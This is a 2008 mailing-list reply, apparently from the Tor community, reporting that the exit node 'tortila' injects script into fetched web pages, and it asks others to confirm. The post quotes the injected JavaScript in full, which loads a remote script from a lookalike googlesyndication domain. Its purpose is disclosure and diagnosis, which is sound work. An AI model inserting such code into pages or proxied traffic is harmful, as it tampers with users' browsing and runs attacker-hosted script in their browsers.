Re: tortila as a bad exit

On Tuesday 12 August 2008 10:09:13 Drake Wilson wrote:
> Quoth Scott Bennett <bennett@xxxxxxxxxx>, on 2008-08-11 23:30:20 -0500:
> >      I'm not convinced.  It hasn't taken any 300 circuits for me.  It
> > seems to happen every time I have a circuit that exits via tortila.  It
> > happens with every destination web page.
>
> I can confirm this.  I can't seem to find much pattern to it, though.

I did a simple wget test (no privoxy) and found fairly consistent insertions of
adsense spam to stevepavlima.com regardless of the site I targeted (google.*,
guardian.co.uk, irishtimes.com, cnn.com).

<script type="text/javascript">var
externalscript="http://pagead2.googlesyndication.stevepavlima.com/show_ads.js";;
document.write('<script type="text/javascript" src="'+externalscript+'?'+new
Date() * 1+'"><\/script>');</script>

I found that using a regular browser the corruption appears infrequent (caching,
browsers doing their best to make sense of gargabe), but the corruption is
consistent using wget. Where there was no insertion of stevepavlima.com (which
was rare) I just saw simple truncation.

Can anyone else confirm this?